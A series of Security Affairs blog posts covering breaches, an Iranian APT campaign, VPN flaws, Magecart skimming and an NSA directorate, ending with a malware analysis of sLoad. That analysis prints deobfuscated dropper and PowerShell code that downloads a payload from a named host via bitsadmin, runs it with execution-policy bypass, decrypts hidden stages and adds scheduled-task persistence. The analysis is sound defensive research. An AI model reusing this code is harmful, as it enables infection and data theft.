The StreetEasy data breach took place in the mid-2016 and exposed 988k records that included names, usernames, email addresses and SHA-1 password hashes. The data has been available for sale in the cybercrime underground since February. In February, Gnosticplayers hacker offered a third round of databases containing millions of hacked accounts from unreported data breaches, including Streeteasy (Real estate) with 990,000 records.

“In approximately June 2016, the real estate website StreetEasy suffered a data breach. In total, 988k unique email addresses were included in the breach alongside names, usernames and SHA-1 hashes of passwords, all of which appeared for sale on a dark web marketplace in February 2019. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

HIBP also included data from a data breach suffered by Sephora Southeast Asia in January 2017 that exposed data for 780,073 customers, including customer’s dates of birth, email addresses, ethnicities, genders, names, and physical attributes.

“In approximately January 2017, the beauty store Sephora suffered a data breach. Impacting customers in South East Asia, Australia and New Zealand, 780k unique email addresses were included in the breach alongside names, genders, dates of birth, ethnicities and other personal information. The data was provided to HIBP by a source who requested it be attributed to “JimScott.Sec@protonmail.com”.” reads HIBP.

Data from the Sephora data breach has been seen being also sold on online hacker forums.

Users impacted by the data breaches have to change their passwords also on every site that shares the same credentials.

Pierluigi Paganini

(SecurityAffairs – StreetEasy, data breach)

The post Data from Sephora and StreetEasy data breaches added to HIBP appeared first on Security Affairs.

PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summers, crooks used PoS malware to steal payment card data of the customers.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee, they confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands, the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise some infrastructure shared by the two restaurant chains.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019. 

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks begun on April 11, 2019, the other two confirmed that attacks started on April 29.

The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes it the cardholder name.

The fourth brand that suffered a payment card breach is Hy-Vee, the restaurant chain provided an update to the notice of payment card data incident released on August 14.

The company confirmed that on July 29, crooks compromised some payment processing systems, in this case, the PoS malware remained active more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Pierluigi Paganini

(SecurityAffairs – restaurant chains, PoS malware)

The post PoS malware infections impacted four restaurant chains in the U.S. appeared first on Security Affairs.

Iran-linked Phosphorus group hit a 2020 presidential campaign

Microsoft says that the Iran-linked cyber-espionage group tracked as Phosphorus (aka APT35Charming KittenNewscaster, and Ajax Security Team) a 2020 presidential campaign.

Microsoft’s Threat Intelligence Center (MSTIC) revealed that an Iran-linked APT group tracked as Phosphorus (aka APT35Charming KittenNewscaster, and Ajax Security Team) attempted to access to email accounts belonging to current and former US government officials, journalists, Iranians living abroad, and individuals involved in a 2020 US presidential campaign.

The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

The experts revealed that the recent campaign carried out by the APT group took place between August and September.

“In a 30-day period between August and September, the Microsoft Threat Intelligence Center (MSTIC) observed Phosphorus making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.” reads the analysis published by Microsoft. “The targeted accounts are associated with a U.S. presidential campaign, current and former U.S. government officials, journalists covering global politics and prominent Iranians living outside Iran.”

The state-sponsored hackers initially conducted a reconnaissance operation to identify high-value targets. Microsoft observed more than 2,700 probes, then the attackers targeted 241 accounts, some of them associated with a U.S. Presidential campaign.

Microsoft confirmed that hackers breached four accounts, but the compromised accounts were not associated with the U.S. Presidential campaign or current and former U.S. government officials.

Microsoft notified all the impacted users about the hacks and provided supports to the victims to secure their accounts.

The hackers initially breached into the victim’s secondary email inbox associated with their Microsoft account, then used them to reset the password. Once they received the reset link to the secondary inbox, the hackers used it to take control of the primary Microsoft account.

“Phosphorus used information gathered from researching their targets or other means to game password reset or account recovery features and attempt to take over some targeted accounts.” continues the report. “For example, they would seek access to a secondary email account linked to a user’s Microsoft account, then attempt to gain access to a user’s Microsoft account through verification sent to the secondary account. In some instances, they gathered phone numbers belonging to their targets and used them to assist in authenticating password resets.”

Microsoft experts pointed out that the attacks attributed to the Phosphorus group even if they were not technically sophisticated used a significant amount of personal information to identify the targets’ accounts and hack them. 

Microsoft recommends its high-profile Microsoft involved in political campaigns, think tanks, or NGOs, to sign up for Microsoft AccountGuard that offers additional protection against the attacks.

“There are currently 60,000 accounts in 26 countries protected by AccountGuard, which provides monitoring and unified threat notification across the Office 365 accounts you use for work and the personal accounts of your staff and others affiliated with your organization that opt-in for this protection.” concludes Microsoft. “To date, we’ve made more than 800 notifications of attempted nation-state attacks to AccountGuard customers.

In March, Microsoft announced that it had taken control of 99 domains used by an Iran-linked APT group tracked by the company as Phosphorus.

The domains attempted to mimic legitimate services belonging to Microsoft and other legitimate online services, such as LinkedIn and Yahoo. The list of seized domains includes verification-live.com, outlook-verify.net, myaccount-services.net, verify-linkedin.net, and yahoo-verify.net.

The threat actors used the websites to serve malware to the victims, they also sent out emails alerting recipients of a security risk in order to trick them into handing over their account credentials.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran-linked Phosphorus group hit a 2020 presidential campaign appeared first on Security Affairs.

Security Affairs newsletter Round 234

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Hacker claims to have stolen over 218M Zynga ‘Words with Friends Gamers records

Masad Stealer Malware exfiltrates data via Telegram

Phishers continue to abuse Adobe and Google Open Redirects

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

A new critical flaw in Exim exposes email servers to remote attacks

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

Irans oil minister orders ‘Full Alert for oil sector on against attacks

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

A new Adwind variant involved in attacks on US petroleum industry

Danish company Demant expects to incur losses of up to $95 after cyber attack

Danish company Demant expects to incur losses of up to $95 Million after cyber attack

Frequent VBA Macros used in Office Malware

Gucci IOT Bot Discovered Targeting European Region

Hackers breached one of Comodo Forums, 245,000 users impacted

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

Teheran: U.S. has started ‘Cyber War against Iran

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Asics apologizes after pornography ran on screens at central store in Auckland for hours

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Experts found 20 Million tax records for Russian citizens exposed online

Former American Express employee under investigation for customers data abuse

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

Zendesk 2016 security breach may impact Uber, Slack, and other organizations

6 cyber-espionage campaigns since 2013 attributed to PKPLUG China-linked group

Dutch police shut down bulletproof service hosting tens of DDoS botnets

FBI warns about high-impact Ransomware attacks on U.S. Organizations

Ukrainian police dismantled a bot farm involved in multiple spam campaigns

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

Egypt regularly spies on opponents and activists with mobile apps

Project Zero researcher found unpatched Android zero-day likely exploited by NSO group

The sLoad Threat: Ten Months Later

Magecart hackers are expanding their operations

NSA Launches New Cybersecurity Directorate

 

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 234 appeared first on Security Affairs.

UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities

The UK’s National Cyber Security Centre (NCSC) warns of attacks exploiting recently disclosed VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure

According to the UK’s National Cyber Security Centre (NCSC), advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

This week the NCSC issued an alert to warn organizations using the vulnerable products.

“The NCSC is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities affecting Virtual Private Network (VPN) products from vendors Pulse securePalo Alto and Fortinet.” reads the alert issued by the NCSC.

“This activity is ongoing, targeting both UK and international organisations. Affected sectors include government, military, academic, business and healthcare,”

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379,

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The CVE-2018-13379 flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

“Users of these VPN products should investigate their logs for evidence of compromise, especially if it is possible that patches were not applied immediately after their release.” concludes the NCSC.

“Apart from specific product advice below, administrators should also look for evidence of compromised accounts in active use, such as anomalous IP locations or times.

Snort rules are available in open source, but may not pick up events for exploits over HTTPS.”

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities appeared first on Security Affairs.

Hacker is auctioning a database containing details of 92 million Brazilians

A database containing details of 92 million Brazilians was auctioned by a threat actor on underground forums along with a search service focused on Brazilians.

Someone is auctioning on several restricted underground forums a database containing personal information of 92 million Brazilian citizens. The threat actor, registered as X4Crow, is also advertising a search service that allows retrieving detailed information on Brazilian citizens.

Brazilians
Source: Bleeping Computer

The records are arranged per province, they include names, dates of birth, and taxpayer ID (CPF – Cadastro de Pessoas Físicas), taxpayer details about legal entities, or the CNPJ (Cadastro Nacional da Pessoa Jurídica).

The initial price to participate in the auction is $15,000, participants can raise the price of 110 each time.

“A post on one of the forums seen by BleepingComputer informs that the database is 16GB large, in SQL format. The starting price for the auction is $15,000 with a step up bid of $1,000.” reported Bleeping computer.

According to BleepingComputer researchers that received a sample of the database, the data are authentic.

At the time of writing, it seems that the seller has not received any bid.

X4Crow also advertises a search service that allows retrieving detailed information on Brazilians (i.e. Email address, profession, education level, possible relatives, neighbors, license plates, vehicle, ID card, driver’s license) simply providing a full name, taxpayer ID, or phone number.

“There is no guarantee that all the details will be retrieved for all individuals but the report may provide, on average, 80% of the specifics listed above.” continues BleepingComputer.

Querying the service to retrieve data on a specific company and its corporate structure could cost up to $150.

According to BleepingComputer, X4Crow is a reliable actor in cybercrime underground even if it isn’t operating for a long time.

Pierluigi Paganini

(SecurityAffairs – Brazilians, cybercrime)

The post Hacker is auctioning a database containing details of 92 million Brazilians appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to target organizations payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

In a report recently published by RiskIQ, experts estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific group. MG5 focuses on supply chain attacks, it is responsible for the hack of hundreds of websites and providers such as SociaPlus and Inbenta.

In June, the gang made the headlines again, after infecting over 17,000 domains by targeting improperly secured Amazon S3 buckets

Recently, IBM researchers observed one of the MG5 group 5 using malicious code to inject into commercial-grade layer 7 L7 routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites powered with the Magento shopping or OpenCart platform.

Magecart

Following a consolidated pattern of attack that is common in the hacking community, Magecart attempt to exploit vulnerabilities that the victims have yet to patch even is security updates have been released by Magento and other software vendors.

Attackers also look for new attack vectors to distribute their software skimming, such as compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers and hit thousands of sites at once.

RiskIQ report revealed that of all malicious advertisements it has analyzed, the 17% is associated with the Magecart groups.

Below other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here: https://www.riskiq.com/research/magecart-growing-threat/

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

NSA Launches New Cybersecurity Directorate

NSA is redefining its cybersecurity mission and with the Cybersecurity Directorate it will enhance its partnerships with unclassified collaboration and information sharing.

Under the new Cybersecurity Directorate — a major organization that unifies NSA’s foreign intelligence and cyberdefense missions

The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks.

The NSA announced the new Cybersecurity Directorate — which will help defend domestic organizations from foreign cyberattacks — in a short press release. The NSA, sometimes called by its nickname, “No Such Agency,” is known for being secretive. But this new directorate seems to signal a pivot towards a more public approach to security than the Agency has taken in the past.

nsa

The directorate also reflects a change in the importance of national cybersecurity and provides a hint as to how government agencies are rethinking how cybersecurity divisions should be organized.

The NSA Makes Cyberdefense a Top Priority

The directorate will unify the NSA’s current foreign intelligence and cyberdefense operations, bringing them together in a “major organization” designed to defend domestic organizations against foreign cyberattacks. The NSA expects the directorate to “reinvigorate NSA’s white hat mission” by seeing the Agency turn towards providing partners and “customers” with threat information, and by otherwise equipping them against cyberattacks.

The directorate will have NSA turn its efforts towards securing military and defense industry security. A short, NSA-produced video at the end of the press release provided more information about what threats the NSA expects to defend the public from — including attacks on infrastructure, theft of classified information, and “mass deception of the public.”

The pivot comes at a time where the nation is facing several security crises and reasonable fears that almost anything that runs on a computer — banks, voting machines, and critical infrastructure — can be compromised or damaged by cyberattacks.

The launch of the new directorate — and the focus of the press release on cyberdefense — follows comments made by Glenn Gerstell, chief counsel of the NSA, back in September. At that time, Gerstell said that the NSA wouldn’t “hack back” in the case of a cyberattack and that the Agency was instead focused on defending key information and infrastructure from theft or damage by foreign actors.

The directorate is not the Agency’s first foray into providing private domestic organizations with intel about foreign hackers. In 2011, as the financial sector was still recovering from the financial crisis of 2008, the Agency began providing Wall Street banks with cybersecurity information in the hopes that it would prevent “financial sabotage.”

The State of Cybersecurity

The directorate reflects a broader change that’s also being seen in the private sector. Cybersecurity is no longer seen as a sub-component of an overall security plan, or as part of the tech department, but as a necessary investment that requires top talent and serious commitment of resources. Networks are more likely to be considered vulnerable and need better defense from cyberattacks.

Businesses are increasingly relying on Internet of Things or “smart” devices to provide data. But these devices are often improperly secured and allow an access point to secure networks, and the valuable information held there. As the world becomes more connected, there are more opportunities for hackers to slip in between the cracks of cyberdefenses and do damage once they have access to secure networks.

In the press release, the NSA said that the Agency will “invest in and rely on its expert workforce.” It’s not clear right now if the new directorate will result in the NSA expanding its cybersecurity workforce. If so, they may run into some of the problems faced by the private sector, in that the number of cybersecurity experts has not kept pace with the frequency of, intensity of, and damage done by cyberattacks.

What the NSA’s Directorate Means for Cybersecurity

The new director shows that cybersecurity is a higher priority than ever for the Agency, and signals a turn to more public involvement in national security. Time will tell how effective the directorate is at preventing or reducing the harm of cyberattacks, but the defense industry is likely happy to receive any help that they can.

Going forward, cybersecurity will continue to become more important as critical infrastructure and essential components of our economy and national defense become more connected. Whether or not the cybersecurity industry will be able to keep up with the rising pace of attacks remains to be seen.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, NSA Cybersecurity Directorate)

The post NSA Launches New Cybersecurity Directorate appeared first on Security Affairs.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419N040619N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

  1. On Error Resume Next
  2. Set ZCzG = CreateObject(“Scripting.FileSystemObject”)
  3. Set PavfQt = WScript.CreateObject (“WScript.Shell”)
  4. Set XaiX = ZCzG.GetFolder(“c:\Users\”)
  5. Recurse(XaiX)
  6. PavfQt.run “bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1”,0,True
  7. i=0
  8. Do While i < 1
  9. If (ZCzG.FileExists(“c:\Users\Public\Downloads\RSbYHuPO.ps1”)) Then
  10. i=1
  11. End If
  12. WScript.Sleep(2280)
  13. Loop
  14. PavfQt.run “powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 “,0,True
  15. Sub Recurse(JFLY)
  16. If IsAccessible(JFLY) Then
  17. For Each oSubFolder In JFLY.SubFolders
  18. Recurse oSubFolder
  19. Next
  20. For Each RIst In JFLY.Files
  21. If InStr(RIst.Name,”.pdf”) > 0 Then
  22. PavfQt.run “explorer “+JFLY+”\”+RIst.Name
  23. End if
  24. Next
  25. End If
  26. End Sub
  27. Function IsAccessible(XaiX)
  28. On Error Resume Next
  29. IsAccessible = (XaiX.SubFolders.Count >= 0)
  30. End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

  1. $oLZz2= “C:\Users\admin\AppData\Roaming”;
  2. $YwbpkcN9XUIv1w=@(1..16);
  3. […]
  4. $main_ini=’76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA’;
  5. $main_ini | out-file $PaIQGLoo’\main.ini’;
  6. $domain_ini=’76492d1116743f0423413b1605 […] YwBlAA==’;
  7. $domain_ini | out-file $PaIQGLoo’\domain.ini’;
  8. […]
  9. try{ […]
  10. }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  11. if ($yC0iBerAupzdtf5Z.length -lt 2){
  12. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  13. $r=8;
  14. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  15. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  16. $sv8eJJhgWV3xAN7Uu=@(1..16);
  17. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  18. $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  19. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  20. Invoke-Expression $DBR4S3t;
  21. }
  22. } | out-file $PaIQGLoo’\’$H3z9RnzIihO8′.ps1′
  23. $OFHc0H4A=’ /F /create /sc minute /mo 3 /TN “S’+$rs+$fLCg9ngJqRHX36hfUr+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$PaIQGLoo+’\’+$JxdRWnHC+’.tmp”‘;
  24. start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
  1. Dim str, min, max
  2. Const LETTERS = “abcdefghijklmnopqrstuvwxyz”
  3. min = 1
  4. max = Len(LETTERS)
  5. Randomize
  6. […]
  7. Set objFSO=CreateObject(“Scripting.FileSystemObject”)
  8. Set winssh = WScript.CreateObject (“WScript.Shell”)
  9. fName=RandomString(10)
  10. JAcalshy=RandomString(4)
  11. fZgxNPDMnu=RandomString(4)
  12. WEHxctVdTEoDfqEqJMP=RandomString(4)
  13. […]
  14. Set objFile = objFSO.CreateTextFile(outFile,8, True)
  15. objFile.Write “Set “+JAcalshy+”=rshe” & vbCrLf
  16. objFile.Write “Set “+fZgxNPDMnu+”=ypa” & vbCrLf
  17. objFile.Write “Set “+WEHxctVdTEoDfqEqJMP+”=il” & vbCrLf
  18. objFile.Close
  19. winssh.run “powershell -ep bypass -file .ps1”,0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

  1. try{
  2. Remove-EventLog:Debug-Job
  3. Export-BinaryMiLog:Get-PSSessionConfiguration
  4. Remove-JobTrigger:New-Item
  5. }catch{
  6. $yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  7. if ($yC0iBerAupzdtf5Z.length -lt 2){
  8. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
  9. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  10. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  11. $sv8eJJhgWV3xAN7Uu=@(1..16);
  12. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”
  13. $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  14. $AKXy3OFCowsfie =
  15. [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  16. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  17. Invoke-Expression $DBR4S3t;
  18. }

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption
Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

  1. $u2K2MQ4 = “`r`n”
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\App’+’Da’+’ta\Ro’+’am’+’ing’;
  4. $hh=’hi’+’dd’+’en’;
  5. $ixXApGeqJKEGY=@(1..16);
  6. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  7. $Erlydj = $Erlydjiyy.UUID;
  8. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  9. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  10. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
  11. If(test-path $Z5lTNXB”\_in”){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB”\_in”;$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; “1” | out-file $Z5lTNXB”\_in”;
  12. try{ Remove-Item $Z5lTNXB’\*’}catch{}
  13. $wsxDITPgQCH+=’76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA’;
  14. […]
  15. $wsxDITPgQCH+=’UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA’;
  16. $wsxDITPgQCH+=’3ADAANQA1AA==’;
  17. $wsxDITPgQCH | out-file $Z5lTNXB’\config.ini’;
  18. $5r8DcJB4ok4+=’76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA’;
  19. […]
  20. $5r8DcJB4ok4+=’YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA’;
  21. $5r8DcJB4ok4 | out-file $Z5lTNXB’\web.ini’;
  22. start-process -windowstyle $hh schtasks ‘/change /tn GoFast /disable’;
  23. $2aWxu9dutZfOPCCgS+=$u2K2MQ4+’Dim ‘;
  24. […]
  25. $nz0oninX6=$ixXApGeqJKEGY -join ‘,’;
  26. $E6M6Np8nhXnu4ndPEJ=’ /F /create /sc minute /mo 3 /TN “U’+$sOmUGoc0ysV8UW+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$Z5lTNXB+’\’+$lNlNrKyk+’.tmp”‘;
  27. start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

  1. $u2K2MQ4 = “rn”;
  2. $lNlNrKyk= –join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
  3. $yIXgWSaXsKD5hanf9uO= $env:userprofile+’\AppData\Roaming’;
  4. $Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
  5. $Erlydj = $Erlydjiyy.UUID;
  6. $sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
  7. $Z5lTNXB = $yIXgWSaXsKD5hanf9uO+”\”+$sOmUGoc0ysV8UW;
  8. If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}
